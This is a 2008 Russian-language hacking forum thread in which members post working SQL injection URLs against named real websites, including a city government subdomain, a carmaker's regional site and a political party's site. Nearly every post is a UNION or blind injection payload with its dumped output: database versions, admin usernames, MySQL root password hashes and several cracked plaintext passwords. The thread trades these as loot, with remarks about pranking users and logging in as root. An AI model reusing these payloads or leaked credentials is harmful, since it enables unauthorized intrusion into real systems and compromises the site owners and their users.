SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    masternet От себя ихних же разрабов добавлю если можно

    http://itdevotion.com/portfoliodetail.php?ID=-5+union+select+1,2,concat_ws(0x3a3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+tbl_user/*

    version: 5.0.45-log::
    user: [email protected]
    database:ktunney_rqop22i

    admin::admin15613$1231fasd89h1a5g89
     
  2. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    pogreboc.com
    Code:
    http://www.pogreboc.com/girl.php?id=1+and+2=999+union+select+concat_ws(0x3a3a3a,id,name,pasw,mail),2+from+users_db--
    кто внимательный, тот заметил, что вывод данных на глаз не виден. Но в сорсах есть)
     
  3. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.annuaire-referencement-site.com/site.php?id=-1+union+select+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x745f61646d696e--
    поля админа
    --------------
    http://www.annuaire-referencement-site.com/site.php?id=-1+union+select+1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--
    все таблы
    ----------------
    http://www.epodsolar.com/site.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
    4.1.20:epodsol_cm:epodsol_usr1@localhost
    ------------
     
    #7063 masternet, 16 Dec 2008
    Last edited: 16 Dec 2008
  4. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    Пока я тут, активность в данном разделе будет.
    Code:
    http://www.memfis.eu/ko7e7a/users.php?id=-32+union+select+1,aes_decrypt(aes_encrypt(convert(concat(id,0x3a,nick,0x3a,name,0x3a,email,0x3a,website),binary),0x71),0x71),3,4,5,6,7+from+users+limit+0,1--
     
  5. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    cpdvd.ru
    Code:
    http://www.cpdvd.ru/catalog.php?id=-4203+union+select+1,2,convert(concat(userid,0x3a,pass,0x3a,nam,0x3a,fam,0x3a,tel),%20binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+users+limit+0,1/*
    Счастье для пранкера, столько паролей от юзеров, которые ещё и телефоны мобильные оставляют.
    Ловите more 1 row sql inj jir.it
    Code:
    http://www.jir.it/main.php?langid=2+and+if(ascii(lower(substring((select+concat(userid,0x3a,username,0x3a,passwd)+from+administration+limit+0,1),1,1)))%3C255,(select%201%20from%20administration),567)=1/*
    administrator:dc8df5c2eecdb245ead108cfb7352f8b
    расшифровать хеш не удалось к сожалению.
     
    1 person likes this.
  6. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    какой-то сайт мвд украинский попался ;)
    Code:
    http://imei.org.ua/search.php?imei=123+union+select+concat_ws(0x3a,host,user,password),2,3,4,5,6,7,8+from+mysql.user+limit+0,1--
    slava@localhost:imei
    Code:
    localhost:root:*2679BA488B8CF696590C7C1D51804387761ECA94
     
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Вас посодят :D

    PageRank: 6 тИЦ: 70

    http://www.accuracy.org/article.php?articleId=-1+union+select+concat_ws(0x2f,version(),user(),database())--

    5.0.67-log/[email protected]/accuracy_accuracy
     
  8. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    .us

    http://laneuse.ci.minneapolis.mn.us
    Code:
    http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,version(),5+from+users--
    version: 5.0.45
    Code:
    http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,concat_ws(login,0x3a,password),5+from+users--
    Login : pass

    jason:566cae743de1911e (MySQL type, расшифровать не удалось)

    http://www.turkuaz.us
    Code:
    http://www.turkuaz.us:80/news_det.php?newsId=1333&catId=-32+union+select+1,version(),3,4--
    version: 4.1.22
    user: [email protected]
    Подобрал единственную таблицу turkuazus.customers, но дальше подроб не пошел (...

    http://www.mugama.com
    Code:
    http://www.mugama.com/profile.php?recordID=-1+union+select+1,version(),3,4,5,6--
    version: 5.0.51a-community

    Code:
    http://www.mugama.com/profile.php?recordID=-1+union+select+1,concat_ws(user_name,0x3a,user_password),3,4,5,6+from+tbl_user--
    admin:43e9a4ab75570f5b:admin
     
    #7068 USAkid, 17 Dec 2008
    Last edited: 17 Dec 2008
    1 person likes this.
  9. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    version: 5.0.30-Debian_1-log
    user: mma@localhost
    database: crmc
     
  10. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    слепая(Subquery returns more than 1 row)
    Code:
    http://www.nightnday.org/detail.php?list_id=1213%20and%20if(ascii(substring((select%20concat(version(),char(58),user())),1,1))>=1,(select%201%20union%20select%202%20),0)--
    4.0.27-max-log:[email protected]
    pr=4
     
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Угу . слепая, из 19 полей 17 выводится :D

    http://www.nightnday.org/detail.php?list_id=-1573+union+select+1,2,3,4,5,concat_ws(0x3a,User(),Database(),Version()),7,8,9,0,11,12,13,14,15,16,17,18,19/*
    И ветка пятая, а не четвёртая
    atom_nightnday@localhost:nightnday:5.0.22
     
    3 people like this.
  12. kolenwal

    kolenwal New Member

    Joined:
    13 Dec 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    http://citycarclub.us/news.php?id_news=-1+union+select+1,2,concat(version(),char(58),user(),char(58),database()),4/*

    4.0.20-log:wwwadmin@localhost:ccc_en

    Есть доступ к mysql.user

    http://citycarclub.us/news.php?id_news=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(concat(user,char(58),password),0x71),0x71)+from+mysql.user+limit+0,1/*
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://felinewww.com/report.php?id=-877+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    4.1.22-standard

    PR 4
     
    _________________________
  14. kolenwal

    kolenwal New Member

    Joined:
    13 Dec 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    http://www.audi.co.at/news.php?newsid=-631+union+select+1,2,3,concat(version(),char(58),user(),char(58),database()),5,6,7,8,9,10,11,12,13,14

    4.0.18-log:[email protected]:audiatdb
     
  15. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    maxygen.com
    PR 6
    Code:
    http://maxygen.com/newsview.php?listid=999+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(user,0x3a,password,0x3a3a3a,host),13,14,15,16,17,18,19,20,21,22,23+from+mysql.user/*
    Code:
    root:55755cfc38918d75:::localhost
    Code:
    root:55755cfc38918d75:::93763-app1.www.desantisbreindel.com
    55755cfc38918d75:Brein950
    p.s Как видно можно подрубиться удаленно под рутом к бд. Сам не пробовал...
    В общем ловите Халявку
     
    #7075 The matrix, 19 Dec 2008
    Last edited: 19 Dec 2008
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    The matrix

    Не все так просто. Этой скуле уже год где то наверное) и никто дальше не продвинулся) .. подключится удаленно нельзя там. А дир под запись доступных нет.
    Кроме того там есть php инклюдинг совершенно простой, и читать все файлы на серваке можно, но ничего с этим не сделаешь(( Даже в админку нельзя зайти, пароль и пасс почему то не подходит(( видимо с определнного ip только можно.. хотя хз..

    --skipped--
     
    #7076 попугай, 19 Dec 2008
    Last edited: 21 Dec 2008
    1 person likes this.
  17. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.lawfirm.ru/article/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(char(32,45,32),version(),user(),database()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
     
  18. 0xA1isa

    0xA1isa Member

    Joined:
    19 Jun 2007
    Messages:
    6
    Likes Received:
    9
    Reputations:
    5
    http://tibetska-medicina.cz/aktuality.php?cislo=-26'+union+select+1,user(),version(),concat_ws(':',username,password),5,6+from+users/*

    karlos:kunes1
     
    1 person likes this.
  19. 0xA1isa

    0xA1isa Member

    Joined:
    19 Jun 2007
    Messages:
    6
    Likes Received:
    9
    Reputations:
    5
    http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,group_concat(table_name+separator+0x0a),8,9,10+from+information_schema.tables/*

    http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,concat(login,0x0a,password),8,9,10+from+login+limit+0,1/*

    mythical:mistake

    и кривая админка конечно же в /admin/ находиться....
     
    1 person likes this.
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,version(),4,5,6,7,8,9/*
    4.0.25-standard
    PR 5

    Code:
    http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat(user,0x3b,password),4,5,6,7,8,9+from+mysql.user/*
    root;14471e9057c154d6
     
    _________________________
    #7080 yarbabin, 19 Dec 2008
    Last edited: 19 Dec 2008
Thread Status:
Not open for further replies.